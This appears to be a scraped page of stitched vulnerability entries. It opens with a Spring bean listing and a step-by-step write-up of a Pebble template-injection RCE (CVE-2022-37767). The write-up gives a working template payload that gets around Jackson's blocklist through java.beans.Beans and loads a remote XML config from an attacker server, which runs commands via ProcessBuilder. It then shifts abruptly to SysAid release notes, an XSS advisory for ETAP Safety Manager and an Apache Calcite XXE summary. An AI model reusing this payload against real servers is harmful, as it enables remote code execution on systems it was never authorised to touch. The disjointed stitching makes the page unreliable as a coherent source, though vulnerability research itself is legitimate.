org.springframework.boot.autoconfigure.websocket.servlet.WebSocketServletAutoConfiguration
org.springframework.boot.autoconfigure.web.servlet.ServletWebServerFactoryConfiguration$EmbeddedTomcat
tomcatServletWebServerFactory
org.springframework.boot.autoconfigure.web.servlet.ServletWebServerFactoryAutoConfiguration
servletWebServerFactoryCustomizer
tomcatServletWebServerFactoryCustomizer
org.springframework.boot.context.properties.ConfigurationPropertiesBindingPostProcessor
org.springframework.boot.context.internalConfigurationPropertiesBinderFactory
org.springframework.boot.context.internalConfigurationPropertiesBinder
org.springframework.boot.context.properties.BoundConfigurationProperties
org.springframework.boot.context.properties.EnableConfigurationPropertiesRegistrar.methodValidationExcludeFilter
server\-org.springframework.boot.autoconfigure.web.ServerProperties
webServerFactoryCustomizerBeanPostProcessor
errorPageRegistrarBeanPostProcessor
org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration$DispatcherServletConfiguration
dispatcherServlet
spring.mvc\-org.springframework.boot.autoconfigure.web.servlet.WebMvcProperties
org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration$DispatcherServletRegistrationConfiguration
dispatcherServletRegistration
org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration
org.springframework.boot.autoconfigure.task.TaskExecutionAutoConfiguration
taskExecutorBuilder
applicationTaskExecutor
spring.task.execution\-org.springframework.boot.autoconfigure.task.TaskExecutionProperties
org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration$WhitelabelErrorViewConfiguration
error
beanNameViewResolver
org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration$DefaultErrorViewResolverConfiguration
conventionErrorViewResolver
spring.web\-org.springframework.boot.autoconfigure.web.WebProperties
org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration
errorAttributes
basicErrorController
errorPageCustomizer
preserveErrorControllerTargetClassPostProcessor
org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration$EnableWebMvcConfiguration
requestMappingHandlerAdapter
welcomePageHandlerMapping
localeResolver
themeResolver
flashMapManager
mvcConversionService
mvcValidator
mvcContentNegotiationManager
requestMappingHandlerMapping
mvcPatternParser
mvcUrlPathHelper
mvcPathMatcher
viewControllerHandlerMapping
beanNameHandlerMapping
routerFunctionMapping
resourceHandlerMapping
mvcResourceUrlProvider
defaultServletHandlerMapping
handlerFunctionAdapter
mvcUriComponentsContributor
httpRequestHandlerAdapter
simpleControllerHandlerAdapter
handlerExceptionResolver
mvcViewResolver
mvcHandlerMappingIntrospector
viewNameTranslator
org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration$WebMvcAutoConfigurationAdapter
defaultViewResolver
viewResolver
requestContextFilter
org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration
formContentFilter
com.mitchellbosecke.pebble.boot.autoconfigure.PebbleServletWebConfiguration
pebbleViewResolver
com.mitchellbosecke.pebble.boot.autoconfigure.PebbleAutoConfiguration
pebbleLoader
springExtension
pebbleEngine
pebble\-com.mitchellbosecke.pebble.boot.autoconfigure.PebbleProperties
org.springframework.boot.autoconfigure.jmx.JmxAutoConfiguration
mbeanExporter
objectNamingStrategy
mbeanServer
spring.jmx\-org.springframework.boot.autoconfigure.jmx.JmxProperties
org.springframework.boot.autoconfigure.admin.SpringApplicationAdminJmxAutoConfiguration
springApplicationAdminRegistrar
org.springframework.boot.autoconfigure.aop.AopAutoConfiguration$ClassProxyingConfiguration
forceAutoProxyCreatorToUseClassProxying
org.springframework.boot.autoconfigure.aop.AopAutoConfiguration
org.springframework.boot.autoconfigure.availability.ApplicationAvailabilityAutoConfiguration
applicationAvailability
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$Jackson2ObjectMapperBuilderCustomizerConfiguration
standardJacksonObjectMapperBuilderCustomizer
spring.jackson\-org.springframework.boot.autoconfigure.jackson.JacksonProperties
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$JacksonObjectMapperBuilderConfiguration
jacksonObjectMapperBuilder
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$ParameterNamesModuleConfiguration
parameterNamesModule
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$JacksonObjectMapperConfiguration
jacksonObjectMapper
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration
jsonComponentModule
jsonMixinModule
org.springframework.boot.autoconfigure.context.ConfigurationPropertiesAutoConfiguration
org.springframework.boot.autoconfigure.context.LifecycleAutoConfiguration
lifecycleProcessor
spring.lifecycle\-org.springframework.boot.autoconfigure.context.LifecycleProperties
org.springframework.boot.autoconfigure.http.HttpMessageConvertersAutoConfiguration$StringHttpMessageConverterConfiguration
stringHttpMessageConverter
org.springframework.boot.autoconfigure.http.JacksonHttpMessageConvertersConfiguration$MappingJackson2HttpMessageConverterConfiguration
mappingJackson2HttpMessageConverter
org.springframework.boot.autoconfigure.http.JacksonHttpMessageConvertersConfiguration
org.springframework.boot.autoconfigure.http.HttpMessageConvertersAutoConfiguration
messageConverters
org.springframework.boot.autoconfigure.info.ProjectInfoAutoConfiguration
spring.info\-org.springframework.boot.autoconfigure.info.ProjectInfoProperties
org.springframework.boot.autoconfigure.sql.init.SqlInitializationAutoConfiguration
spring.sql.init\-org.springframework.boot.autoconfigure.sql.init.SqlInitializationProperties
org.springframework.boot.sql.init.dependency.DatabaseInitializationDependencyConfigurer$DependsOnDatabaseInitializationPostProcessor
org.springframework.boot.autoconfigure.task.TaskSchedulingAutoConfiguration
scheduledBeanLazyInitializationExcludeFilter
taskSchedulerBuilder
spring.task.scheduling\-org.springframework.boot.autoconfigure.task.TaskSchedulingProperties
org.springframework.boot.autoconfigure.web.client.RestTemplateAutoConfiguration
restTemplateBuilderConfigurer
restTemplateBuilder
org.springframework.boot.autoconfigure.web.embedded.EmbeddedWebServerFactoryCustomizerAutoConfiguration$TomcatWebServerFactoryCustomizerConfiguration
tomcatWebServerFactoryCustomizer
org.springframework.boot.autoconfigure.web.embedded.EmbeddedWebServerFactoryCustomizerAutoConfiguration
org.springframework.boot.autoconfigure.web.servlet.HttpEncodingAutoConfiguration
characterEncodingFilter
localeCharsetMappingsCustomizer
org.springframework.boot.autoconfigure.web.servlet.MultipartAutoConfiguration
multipartConfigElement
multipartResolver
spring.servlet.multipart\-org.springframework.boot.autoconfigure.web.servlet.MultipartProperties
org.springframework.aop.config.internalAutoProxyCreator

Fortunately we quickly found a class that fit the criteria and it helped us get the classloader object

It is not enough to execute loadclass, we also need to instantiate the class. And It's also very simple, there is jackson among spring's dependencies, through jackson deserialization we can easily instantiate a class.

Fortunately there is this jacksonObjectMapper object in the beans.Now we can instantiate arbitrary classes, and by being able to instantiate arbitrary classes we have bypassed the filtering restrictions

In the spring scenario we can easily think of a configuration class org.springframework.context.support.ClassPathXmlApplicationContext, which allows us to load a remote xml configuration file, through which we can easily implement the command execution.

But...

At this point you will find that any class jackson that inherits from AbstractPointcutAdvisor and AbstractApplicationContext will not be allowed to instantiate

    public void validateSubType(DeserializationContext ctxt, JavaType type, BeanDescription beanDesc) throws JsonMappingException {
        Class<?> raw = type.getRawClass();
        String full = raw.getName();
        if (!this.\_cfgIllegalClassNames.contains(full)) {
            if (raw.isInterface()) {
                return;
            }

            if (full.startsWith("org.springframework.")) {
                Class cls = raw;

                while(true) {
                    if (cls == null || cls == Object.class) {
                        return;
                    }

                    String name = cls.getSimpleName();
                    if ("AbstractPointcutAdvisor".equals(name) || "AbstractApplicationContext".equals(name)) {
                        break;
                    }

                    cls = cls.getSuperclass();
                }
            } else if (!full.startsWith("com.mchange.v2.c3p0.") || !full.endsWith("DataSource")) {
                return;
            }
        }

        ctxt.reportBadTypeDefinition(beanDesc, "Illegal type (%s) to deserialize: prevented for security reasons", new Object\[\]{full});
    }

What to do at this time? We found a class called java.beans.Beans in jre.

The instantiate method of this class can help us instantiate arbitrary methods.

public static Object instantiate(ClassLoader cls, String beanName) throws IOException, ClassNotFoundException {
  return Beans.instantiate(cls, beanName, null, null);
}

Here the classloader parameter is allowed to be set to empty, if it is empty later will be through the ClassLoader.getSystemClassLoader (); get, of course, in fact, we also get a classloader at the top which is not the point，It will eventually return an instantiated object based on the beanName passed in.

if (result == null) {
  // No serialized object, try just instantiating the class
  Class<?> cl;

  try {
    cl = ClassFinder.findClass(beanName, cls);
  } catch (ClassNotFoundException ex) {
    // There is no appropriate class.  If we earlier tried to
    // deserialize an object and got an IO exception, throw that,
    // otherwise rethrow the ClassNotFoundException.
    if (serex != null) {
      throw serex;
    }
    throw ex;
  }

  if (!Modifier.isPublic(cl.getModifiers())) {
    throw new ClassNotFoundException("" + cl + " : no public access");
  }

  /\*
             \* Try to instantiate the class.
             \*/

  try {
    result = cl.newInstance();
  } catch (Exception ex) {
    // We have to remap the exception to one in our signature.
    // But we pass extra information in the detail message.
    throw new ClassNotFoundException("" + cl + " : " + ex, ex);
  }
}

So we get the ClassPathXmlApplicationContext class that was forbidden to be instantiated by indirect means.

So by stringing these points together we can easily get the following payload

{% set y\= beans.get("org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory").resourceLoader.classLoader.loadClass("java.beans.Beans") %}
{% set yy =  beans.get("jacksonObjectMapper").readValue("{}", y) %}
{% set yyy = yy.instantiate(null,"org.springframework.context.support.ClassPathXmlApplicationContext") %}
{{ yyy.setConfigLocation("http://xxx.xxx.xxx/1.xml") }}
{{ yyy.refresh() }}

1.xml

<?xml version\="1.0" encoding\="UTF-8" ?>
    <beans xmlns\="http://www.springframework.org/schema/beans"
       xmlns:xsi\="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation\="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"\>
        <bean id\="pb" class\="java.lang.ProcessBuilder" init-method\="start"\>
            <constructor-arg >
            <list\>
                <value\>open</value\>
                <value\>-a</value\>
                <value\>calculator</value\>
            </list\>
            </constructor-arg\>
        </bean\>
    </beans\>

with http server in your vps

    python3 -m http.server 80
    

Successfully triggered command execution by template file called rce.pebble

CVE-2022-37767: command execution vulnerability in pebble 3.1.5(latest) · Issue #3 · Y4tacker/Web-Security

SysAid Help Desk before 22.1.65 allows XSS via the Asset Dashboard, aka FR# 67262.

*   Updated on 28 Jul 2022
*   5 Minutes to read

*   Print
    
*   Share
    
*   Dark
    
    Light
    

**GA June 6, 2022****Feature Requests**

**FR#**

**Description**

**Module/Tool**

52960

Reports generated in Excel are now exported in XLSX format for better experience and support of extra-large files.

Analytics

54161

Improved Patch Management implementation mechanism to resolve Apache HTTPD vulnerability errors. (This also covers FR# 58032.)

Patch Management

52260

Admins can map CI Fields to the Owner Group field when importing CIs into SysAid’s CMDB.

CMDB

64356

Created a new ‘$ReopenSR-requires\_login’ tag for ticket notifications.  
Using this tag will verify that the user who clicked the link is logged in to SysAid and update the SR as needed.

Help Desk

51918

A new check box in the Escalation Rules form allows admins to set reminders on action items.  
Configuration requires using custom user fields and action items dependencies.

Help Desk

53457

Admins can filter columns in the routing rules list by specific values.

Help Desk

60457

We added two new variable tags that can be added to ticket notifications in both the recipient field and the body of the notification:

*   $RequestUserManager – The direct manager of the ticket’s request user.
*   $AIAssigneeDirectManager – The direct manager of the user assigned to the action item.

Help Desk

66409

Improved performance in loading the Self-Service Portal in different sections: Catalogue items, FAQs, new ticket and category display and drop downs.  
This addresses bugs 65724, 60463, and 54442 as well.

Self-Service Portal

53656

Admins can define how many tickets are displayed in the Self-Service Portal scoreboard page when the end-user clicks Show All.

Self-Service Portal

60979

Improved performance around the loading of tickets in the scoreboard for a better customer experience.

Self-Service Portal

66129

Added validation when end-users self-registered for the Self-Service Portal.

Self-Service Portal

67236

Removed capability to import and export knowledge base articles to and from the SysAid Community in preparation for the relaunch of the community.

Knowledge Base

65579

Tightened security around potential XSS vulnerabilities (also covers bug #66542).

Security

65584

Tightened security around changing password capability on the My Settings page.

Security

67238

Removed or restricted access to certain vulnerable files on the SysAid server. This also covers FR #67237

Security

67241

Tightened security against potential XSS (cross-site scripting) attacks in the Password Services module.

Security

67258

Tightened security against potential XSS (cross-site scripting) attacks via the Linked SRs field.

Security

67262

Tightened security against potential XSS (cross-site scripting) attacks in the Asset Dashboard.

Security

66686

Added validation of file types when attachments are uploaded to SysAid. See list of supported file types here.

Security

52825

Admins can now sort the Asset list by the Last Access Time column in ascending or descending order.

Asset Management

64635

Changes were made to the Microsoft Azure interface. We updated the online help for the O365 integration to include the needed configuration changes.

Third-Party Integration

65264

Updated our documentation for setting up the OneLogin SSO integration in response to changes in OneLogin’s requirements.

Third-Party Integration

61365

Tightened security around access to LDAP Imported users via the API. This covers CVE-2021-36721.

Security

66686 (\*)

Added validation of file types when attachments are uploaded to SysAid. See list of supported file types here. This covers CVE-2021-22796.

Security

66692

Tightened security around access for non-admin users. This covers CVE-2022-22798.

Security

67656

Tightened security against potential Cross-Site Scripting (XSS) attacks. This covers CVE-2022-23165. This also covers FR #5209.

Security

67655

Tightened security around access to vulnerable files in the SysAid server.  
This covers CVE-2022-23166.

Security

66687

Resolved vulnerabilities related to Apache Tomcat.

Security

**Bug Fixes**

**Bug #**

**Description**

**Module/Tool**

61655

Fixed a bug that caused an empty list page to open when admins clicked on the Highest Values graph in the Dashboard.

Analytics

64779

Fixed a bug that caused SysAid to create duplicate asset records when the asset ID generated by the SysAid agent consisted of only one digit.

Asset Management

57188

Fixed a bug that prevented SysAid from displaying changes to an admin’s Company, Location, and Department fields on an asset that was automatically assigned to that admin.

Asset Management

66131

Fixed a bug that generated errors when an admin attempted to import Chromebook devices that were missing an Auto-update expiration date.

Asset Management

64125

Fixed a bug that caused a timeout when admins tried exporting the list of assets that were using a software product.

Asset Management

52731

Fixed a bug that prevented SysAid from properly displaying graphs in the dashboard when the dashboard headers contained certain special characters.

Dashboard

65798

Fixed a bug that sometimes caused timeouts when SysAid was loading the email rules page.

Email Integration

66132

Fixed a bug that caused SysAid to ignore certain user parameters in routing rules on tickets generated via email, when email integration was configured with OAuth 2.0 protocol.

Email Integration

65798

Fixed a bug that sometimes caused timeouts when SysAid was loading the email rules page.

Email Integration

65211

Fixed a bug that sometimes prevented admins from changing the order of routing rules.

Help Desk

65409

Fixed a bug that caused escalation rules to run outside of the defined operating hours.

Help Desk

66388

Fixed a bug that sometimes prevented users from logging in to the Mobile solution after they had logged out.

Mobile

65757

Fixed a bug that prevented the Self-Service Portal from displaying the profile menu when it was opened via the hotkey.

Self Service Portal

64572

Fixed a bug that caused the agent hotkey to open the now deprecated End-User Portal when the Self-Service Portal was disabled in that account.

Self Service Portal

65199

Fixed a bug that prevented end users from automatically downloading the ticket attachment after login to the Self-Service Portal, when they click on the ‘${LinkToAttachments}’ tag in a ticket email notification.

Self Service Portal

65353

Fixed a bug that sometimes caused content generated by category pointers from appearing in the service catalog.

Self Service Portal

65363

Fixed a bug that sometimes generated an error when admins tried to populate data in a workflow template with many action items.

Service Desk

63121

Fixed a bug that prevented the Self-Service Portal’s Scoreboard from displaying any items in the full Workflow Actions list when one of the workflow actions on the list had been deleted from its template.

Service Desk

64086

Fixed a bug that prevented SysAid from sending emails with attachments larger than 3MB when email integration was configured for O365 using the Oauth 2.0 protocol.

Third-Party Integration

66123

Fixed a bug that caused the ‘Can be assigned to service record’ setting to be reverted to its default for Azure-imported user groups when SysAid synced with Azure.

Third-Party Integration

66620

Fixed a bug that prevented Azure-imported admins from seeing tickets assigned to their group.

Third-Party Integration

65590

Added the capability to remove configurations in the Multi SSO Connector setup page, along with other minor UI updates.

Third-Party Integration

65802

Fixed a bug that prevented admins from changing the HTML displayed in their login screen for the SSO Connector add-on.

Third-Party Integration

57227

Fixed a bug that caused users who were demoted from admin to end user to maintain some of their original admin permissions.

User Management

Was this article helpful?

CVE-2022-40325: 22.1.65 Release Notes - On-Premises Releases

Input passed to the GET parameter 'action' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site.

Title: ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSS  
Advisory ID: ZSL-2022-5711  
Type: Local/Remote  
Impact: Cross-Site Scripting  
Risk: (4/5)  
Release Date: 11.09.2022

**Summary**

The ETAP Safety Manager (ESM) is a central managing and control system that helps you to monitor, adjust and maintain your emergency lighting system. Therefore each luminaire connected to your ESM network is given a unique code. The ESM can easily identify the luminaires individually and automatically report whether all luminaires work properly. You can either choose between a wired or wireless network, or a combination of both. With ESM you will not only manage your self contained or your centrally supplied ‘ETAP Battery System’ (EBS) emergency luminaires’, but also DALI emergency units and K9 LED modules, which you can build into your luminaires. Since your ESM system is connected to the Internet, you will always have access to it through the World Wide Web. ESMweb™ is an ‘embedded web server’ application for monitoring an emergency lighting system, which runs in the ‘ESM web controller’. The ESMweb™ application can be accessed from any PC in the corporate network or connected to the Internet - by a standard web browser.

**Description**

Input passed to the GET parameter 'action' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site.

**Vendor**

ETAP Lighting International NV - https://www.etaplighting.com

**Affected Version**

1.0.0.32

**Tested On**

Apache/2.4.41 (Ubuntu)

**Vendor Status**

N/A

**PoC**

etap\_xss.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[11.09.2022\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSS

In Apache Calcite prior to version 1.32.0 the SQL operators EXISTS_NODE, EXTRACT_XML, XML_TRANSFORM and EXTRACT_VALUE do not restrict XML External Entity references in their configuration, which makes them vulnerable to a potential XML External Entity (XXE) attack. Therefore any client exposing these operators, typically by using Oracle dialect (the first three) or MySQL dialect (the last one), is affected by this vulnerability (the extent of it will depend on the user under which the application is running). From Apache Calcite 1.32.0 onwards, Document Type Declarations and XML External Entity resolution are disabled on the impacted operators.

**Email display mode:**

Modern rendering  
Legacy rendering

Tag

#apache